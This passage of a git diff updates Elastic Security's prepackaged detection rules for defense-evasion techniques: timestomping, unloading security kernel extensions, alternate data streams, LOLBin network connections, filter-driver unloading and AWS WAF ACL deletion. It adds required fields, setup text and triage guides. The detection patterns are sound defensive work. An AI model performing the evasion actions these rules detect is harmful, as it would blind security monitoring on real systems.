{ + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "7f370d54-c0eb-4270-ac5a-9a6020585dc6", "severity": "medium", @@ -41,5 +93,5 @@ } ], "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_zoom_child_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_zoom_child_process.json index ea6a7027592be..9705528b13dd2 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_zoom_child_process.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_suspicious_zoom_child_process.json @@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Zoom Child Process", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\", \"info\") and\n process.parent.name : \"Zoom.exe\" and process.name : (\"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "97aba1ef-6034-4bd3-8c1a-1e0996b27afa", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -48,5 +66,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_system_critical_proc_abnormal_file_activity.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_system_critical_proc_abnormal_file_activity.json index eac0233b1e76a..b7ced339d4ed0 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_system_critical_proc_abnormal_file_activity.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_system_critical_proc_abnormal_file_activity.json @@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Executable File Creation by a System Critical Process", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Unusual Executable File Creation by a System Critical Process\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these\ncharacteristics is file operations.\n\nThis rule looks for the creation of executable files done by system-critical processes. This can indicate the exploitation\nof a vulnerability or a malicious process masquerading as a system-critical process.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed by the subject process such as network connections, registry or file\nmodifications, and any spawned child processes.\n- Retrieve the process executable and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "file where event.type != \"deletion\" and\n file.extension : (\"exe\", \"dll\") and\n process.name : (\"smss.exe\",\n \"autochk.exe\",\n \"csrss.exe\",\n \"wininit.exe\",\n \"services.exe\",\n \"lsass.exe\",\n \"winlogon.exe\",\n \"userinit.exe\",\n \"LogonUI.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "e94262f2-c1e9-4d3f-a907-aeab16712e1a", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -43,5 +61,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_tcc_bypass_mounted_apfs_access.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_tcc_bypass_mounted_apfs_access.json index 4b1f13a10414d..98cb6c6db886c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_tcc_bypass_mounted_apfs_access.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_tcc_bypass_mounted_apfs_access.json @@ -15,6 +15,28 @@ "references": [ "https://theevilbit.github.io/posts/cve_2020_9771/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "b00bcd89-000c-4425-b94c-716ef67762f6", "severity": "high", @@ -23,7 +45,8 @@ "Host", "macOS", "Threat Detection", - "Defense Evasion" + "Defense Evasion", + "CVE_2020_9771" ], "threat": [ { @@ -44,5 +67,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_timestomp_touch.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_timestomp_touch.json index 7e507dc83e38c..cd4e11502cf6d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_timestomp_touch.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_timestomp_touch.json @@ -12,10 +12,33 @@ "license": "Elastic License v2", "max_signals": 33, "name": "Timestomping using Touch Command", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type == \"start\" and\n process.name : \"touch\" and user.id != \"0\" and\n process.args : (\"-r\", \"-t\", \"-a*\",\"-m*\") and\n not process.args : (\"/usr/lib/go-*/bin/go\", \"/usr/lib/dracut/dracut-functions.sh\", \"/tmp/KSInstallAction.*/m/.patch/*\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "b0046934-486e-462f-9487-0d4cf9e429c6", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -51,5 +74,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unload_endpointsecurity_kext.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unload_endpointsecurity_kext.json index aadcaadaba980..cdc517554ec4c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unload_endpointsecurity_kext.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unload_endpointsecurity_kext.json @@ -12,6 +12,28 @@ "license": "Elastic License v2", "name": "Attempt to Unload Elastic Endpoint Security Kernel Extension", "query": "event.category:process and event.type:(start or process_started) and\n process.name:kextunload and process.args:(\"/System/Library/Extensions/EndpointSecurity.kext\" or \"EndpointSecurity.kext\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "70fa1af4-27fd-4f26-bd03-50b6af6b9e24", "severity": "high", @@ -44,9 +66,31 @@ ] } ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.006", + "name": "Kernel Modules and Extensions", + "reference": "https://attack.mitre.org/techniques/T1547/006/" + } + ] + } + ] } ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_ads_file_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_ads_file_creation.json index 67c2d2fdca43a..f5c6baed30ae3 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_ads_file_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_ads_file_creation.json @@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual File Creation - Alternate Data Stream", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "file where event.type == \"creation\" and\n file.path : \"C:\\\\*:*\" and\n not file.path : \"C:\\\\*:zone.identifier*\" and\n file.extension :\n (\n \"pdf\",\n \"dll\",\n \"png\",\n \"exe\",\n \"dat\",\n \"com\",\n \"bat\",\n \"cmd\",\n \"sys\",\n \"vbs\",\n \"ps1\",\n \"hta\",\n \"txt\",\n \"vbe\",\n \"js\",\n \"wsh\",\n \"docx\",\n \"doc\",\n \"xlsx\",\n \"xls\",\n \"pptx\",\n \"ppt\",\n \"rtf\",\n \"gif\",\n \"jpg\",\n \"png\",\n \"bmp\",\n \"img\",\n \"iso\"\n )\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "71bccb61-e19b-452f-b104-79a60e546a95", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_dir_ads.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_dir_ads.json index 2c570f9e66eb4..e072806036142 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_dir_ads.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_dir_ads.json @@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Process Execution Path - Alternate Data Stream", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type == \"start\" and\n process.args : \"?:\\\\*:*\" and process.args_count == 1\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + } + ], "risk_score": 47, "rule_id": "4bd1c1af-79d4-4d37-9efa-6e0240640242", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_network_connection_via_dllhost.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_network_connection_via_dllhost.json index 1b6b500d42413..cec08714d8215 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_network_connection_via_dllhost.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_network_connection_via_dllhost.json @@ -18,6 +18,38 @@ "https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/", "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "c7894234-7814-44c2-92a9-f7d851ea246a", "severity": "medium", @@ -39,12 +71,12 @@ "technique": [ { "id": "T1218", - "name": "Signed Binary Proxy Execution", + "name": "System Binary Proxy Execution", "reference": "https://attack.mitre.org/techniques/T1218/" } ] } ], "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_network_connection_via_rundll32.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_network_connection_via_rundll32.json index f37b6a21c7e58..4fc6dc855d7e6 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_network_connection_via_rundll32.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_network_connection_via_rundll32.json @@ -12,9 +12,43 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Network Connection via RunDLL32", + "note": "## Triage and analysis\n\n### Investigating Unusual Network Connection via RunDLL32\n\nRunDLL32 is a built-in Windows utility and also a vital component used by the operating system itself. The functionality\nprovided by RunDLL32 to execute Dynamic Link Libraries (DLLs) is widely abused by attackers, because it makes it hard to\ndifferentiate malicious activity from normal operations.\n\nThis rule looks for external network connections established using RunDLL32 when the utility is being executed with no\narguments, which can potentially indicate command and control activity.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the target host that RunDLL32 is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Identify the target computer and its role in the IT environment.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full scan using the antimalware tool in place. This scan can reveal additional artifacts left in the system,\npersistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id with maxspan=1m\n [process where event.type in (\"start\", \"process_started\") and process.name : \"rundll32.exe\" and process.args_count == 1]\n [network where process.name : \"rundll32.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\",\n \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\",\n \"100.64.0.0/10\", \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\")]\n", "references": [ - "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" + "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml", + "https://redcanary.com/threat-detection-report/techniques/rundll32/" + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } ], "risk_score": 47, "rule_id": "52aaab7b-b51c-441a-89ce-4387b3aea886", @@ -37,7 +71,7 @@ "technique": [ { "id": "T1218", - "name": "Signed Binary Proxy Execution", + "name": "System Binary Proxy Execution", "reference": "https://attack.mitre.org/techniques/T1218/", "subtechnique": [ { @@ -51,5 +85,5 @@ } ], "type": "eql", - "version": 10 + "version": 12 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_process_network_connection.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_process_network_connection.json index a882a3d57f750..f3c6830788d7c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_process_network_connection.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_process_network_connection.json @@ -12,7 +12,25 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Process Network Connection", + "note": "## Triage and analysis\n\n### Investigating Unusual Process Network Connection\n\nThis rule identifies network activity from unexpected system utilities and applications. These applications are commonly\nabused by attackers to execute code, evade detections, and bypass security protections.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the target host that the process is communicating with.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full scan using the antimalware tool in place. This scan can reveal additional artifacts left in the system,\npersistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where (process.name : \"Microsoft.Workflow.Compiler.exe\" or\n process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"xwizard.exe\") and\n event.type == \"start\"]\n [network where (process.name : \"Microsoft.Workflow.Compiler.exe\" or\n process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"xwizard.exe\")]\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "610949a1-312f-4e04-bb55-3a79b8c95267", "severity": "low", @@ -41,5 +59,5 @@ } ], "type": "eql", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_system_vp_child_program.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_system_vp_child_program.json index eaff79d12b68d..f07c2b675556e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_system_vp_child_program.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_unusual_system_vp_child_program.json @@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Child Process from a System Virtual Process", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.pid == 4 and\n not process.executable : (\"Registry\", \"MemCompression\", \"?:\\\\Windows\\\\System32\\\\smss.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.pid", + "type": "long" + } + ], "risk_score": 73, "rule_id": "de9bd7e0-49e9-4e92-a64d-53ade2e66af1", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -43,5 +61,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_via_filter_manager.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_via_filter_manager.json index 8457e79426754..7d923566c8a40 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_via_filter_manager.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_via_filter_manager.json @@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Evasion via Filter Manager", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and \n process.name : \"fltMC.exe\" and process.args : \"unload\"\n", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\") and\n process.name : \"fltMC.exe\" and process.args : \"unload\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "06dceabf-adca-48af-ac79-ffdf4c3b1e9a", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 9 + "version": 11 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_waf_acl_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_waf_acl_deletion.json index 1b959097e30c9..c5605bc79ab2a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_waf_acl_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_waf_acl_deletion.json @@ -15,14 +15,39 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS WAF Access Control List Deletion", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.action:DeleteWebACL and event.outcome:success\n", "references": [ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/waf-regional/delete-web-acl.html", "https://docs.aws.amazon.com/waf/latest/APIReference/API_wafRegional_DeleteWebACL.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "91d04cd4-47a9-4334-ab14-084abe274d49", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -58,5 +83,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_waf_rule_or_rule_group_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_waf_rule_or_rule_group_deletion.json index e23fb0c2d9829..f1b5d5747cf1e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_waf_rule_or_rule_group_deletion.json +++ 